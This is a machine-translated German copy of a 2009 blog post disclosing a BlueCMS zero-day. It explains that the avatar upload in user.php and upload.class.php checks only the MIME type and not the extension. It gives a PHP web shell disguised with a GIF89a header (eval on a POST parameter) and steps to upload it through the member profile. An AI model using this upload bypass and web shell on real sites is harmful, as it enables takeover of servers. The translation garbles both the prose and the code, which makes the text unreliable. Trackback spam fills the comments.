RSS

BlueCMS 0 Tage

Dieser Eintrag wurde am 7. Oktober 2009 veröffentlicht

: St0p
Reproduziert geben Sie bitte die Quelle: http://www.st0p.org

Hinweis: Leider können die Version der Morgen Haare in der Nacht heißt dual gegenüber der Zeitung ein 0day, informiert, und nur auf der offiziellen gehen sah, und veröffentlichte ein Sicherheits-Patch bald ah .. Sie können online gehen nicht eine aktualisierte Version des Test ...

Ach, Gruppe Ein Freund von mir ein CMS gemacht, sagte Nutzdaten zu modifizieren einige injiziert werden, sagte der Analyse, mit der lokal installierten nach, können keine einfachen Anführungszeichen sind magic_quotes_gpc = off entgangen. . .

Siehe include / common.inc.php Linie, aufzugeben. .

  Ein
 2
 3
 4
 5
 6
 7
 8
 9
  ......
  ! get_magic_quotes_gpc ( ) ) if (! get_magic_quotes_gpc ())
  {
 	 deep_addslashes ( $_POST ) ; $ _POST = Deep_addslashes ($ _POST);
 	 deep_addslashes ( $_GET ) ; $ _GET = Deep_addslashes ($ _GET);
 	 deep_addslashes ( $_COOKIES ) ; $ _COOKIES = Deep_addslashes ($ _COOKIES);
 	 deep_addslashes ( $_REQUEST ) ; = $ _REQUEST Deep_addslashes ($ _REQUEST);
  }
 ...... 

Vielleicht St0p viel Glück, siehe Bilder hochladen von Teilen, die Analyse von Code, verwenden Sie etwas in user.php gefunden. .

  Ein
 2
 3
 4
 5
 6
  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 require_once (BLUE_ROOT. 'include / upload.class.php'); / / Aufruf der Upload-Klasse
     new upload ( ) ; $ Image = new der Upload ();
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { if (isset ($ _FILES ['face_pic'] ['error']) && $ _FILES ['face_pic'] ['error'] == 0) {
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; Face_pic $ = $ Bild -> img_upload ($ _FILES ['face_pic'], 'face_pic'); 
                          / / Nicht erkannt Suffix direkt in, wird die Klasse der Lage sein, Shell übergeben
	 } 

Öffnen Sie die include / upload.class.php nur, um die Datei-Header erkennt erkennt nicht das Suffix

  Ein
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 upload { private $allow_image_type = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; ...... function img_upload ( $file , $dir = '' , $imgname = '' ) { if ( empty ( $dir ) ) { $dir = BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; } else { $dir = BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; } if ( ! file_exists ( $dir ) ) { if ( ! mkdir ( $dir ) ) { showmsg ( '上传过程中创建目录失败' ) ; } } if ( empty ( $imgname ) ) { $imgname = $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; } $imgname = $dir . $imgname ; if ( ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { //只是检测了文件头部来着,那我们就直接构造一个SHELL就好了 showmsg ( '不允许的图片类型' ) ; } } Upload ...... Klasse {private $ allow_image_type = array ('image / jpg', 'image / gif', 'image / jpeg', 'image / pjpeg'); ...... Funktion img_upload ($ Datei, $ dir ='', $ imgname ='') {if (empty ($ dir)) {$ dir = BLUE_ROOT Data Upload date ("YM") "/";....} else {$ dir = BLUE_ROOT Data Upload $ dir "/";..} if (file_exists ($ dir)) {if (mkdir ($ dir)) {ShowMsg ("die Upload-Prozess Konnte Verzeichnis erstellen ');}} if (empty ($ imgname)) {$ imgname = $ this -> create_tempname () $ this -> get_type ($ file ['name']);.} $ imgname = $ dir $ imgname; if (in_array ($.! file ['type'], $ this -> allow_image_type)) {/ / nur um die Datei-Header mit zu erfassen, haben wir direkt konstruieren eine SHELL wie ein ShowMsg von Bild-Typ ("nicht zulässig");}} 

Die oben genannten Save for st0p.php

  Ein
 2
  GIF89a
 ( $_POST [ st0p ] ) ; ?> <'Eval ($ _POST [St0p]);?> 

Hinweis Network-Konto anmelden, Mitglied -> mein Profil, laden Sie dann das neue Image der Wahl konstruierten wir eine PHP-Datei, zeigen Sie auf Ändern bestätigen, sehen die Adresse erfolgreich ist, auf das Foto direkt auf der Linie mit der rechten Maustaste. . Word-SHELL erfolgreich hochgeladen!

bluecms-0day1

bluecms-0day2

Analyse abgeschlossen ist, hoffe ich, dass mehr Austausch, die Frage der diese Dinge wollen einfach nur ein paar Freunde zusammenkommen, um die Technologie zu diskutieren, einzurichten Gruppe als auch, nur ein gewöhnlicher Gruppe, nur 100 Personen, aufzuräumen, nie sprechen wurde schwer B Chaos T, deprimiert, ist offen Gruppe zum Austausch, sprechen nicht gewesen Platzhalter an Ort und Stelle, beladen wollen, um die Fortschritte, kann unnahbar Weg nicht gehen!
Wenn Sie in der Gruppe, nur um die Ergebnisse der Gespräche von anderen von anderen zu bekommen, weiß nicht, zu bezahlen, oder einfach nur kommen, Tauchen, oder ohne. . .

Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


72 Responses to "BlueCMS 0 Tage"

  1. Ja, verjetno ZATO JE


  1. 71 Trackback (s)

  2. Beginners Guide Bleistiftzeichnung
  3. die Boston Taxi
  4. Gärtner in. Crouch End das N8
  5. Landschaftsgärtner London
  6. EBook
  7. Definitive Technology supercubeï ¿ ½ 6000
  8. Nutricion deportiva
  9. Whatman, Extraktionshülsen
  10. TIU 1
  11. portarollo
  12. antykwariaty
  13. ï »¿ Alpha Garantieleistungen,
  14. Alpha-Garantieleistungen
  15. NBA-Vorhersagen
  16. Manistee Hochzeitsfotograf
  17. WOF Christchurch
  18. free porn videos zu
  19. Bodybuilding-T-Shirt
  20. die NFL Odds
  21. Wo kann man wetten, Super Bowl 46
  22. Rückenverletzung
  23. Kostenlose Kleinanzeigen
  24. St George Chiropraktiker
  25. Hellseher uk
  26. Sportwetten Sportwetten
  27. Phlebotomie Techniker
  28. Mazda Ersatzteile
  29. Auto Schlosser in Port Richmond, NY
  30. agustus
  31. trycholog Gdynia
  32. Ölwechsel Coupons
  33. Top-asiatischen Sportwetten
  34. Donald kleine Bobby zu ducken abonnement
  35. Auckland drainlayer
  36. psychische Licht
  37. elektrik
  38. Die physikalische Therapie Assistent
  39. Camper Welt
  40. Hellseher
  41. Abdel-Malik
  42. Häuser nz
  43. Golfschwung Hilfe
  44. Tischlerei Auckland
  45. Wahrsagen
  46. Hühner Nacht
  47. Aboubakar
  48. Online-Spiele
  49. Alisson
  50. NBA-Tipps
  51. freie psychische der Chat
  52. Sicherheitstüren nz
  53. Wander-Stores
  54. Erholungsheime in. Auckland
  55. Bausachverständige Auckland
  56. Online-Shop der Fisch
  57. Ares, kostenloser Download
  58. Szkola jazdy Gdynia opinie
  59. antykwariaty
  60. Blinds
  61. Free Beats von Dre
  62. Fidschi-Pakete
  63. Standortmarketing
  64. Baumhäuser
  65. Dynamische Insulation
  66. von Tribal Tattoos
  67. Rangliste SEO Services,
  68. Supply Chain Management Course,
  69. CIA Test Prep
  70. Windows-Auckland
  71. Chanel, UHREN
  72. Kfz-Versicherung Anführungszeichen

Sie müssen eingeloggt um einen Kommentar abzugeben.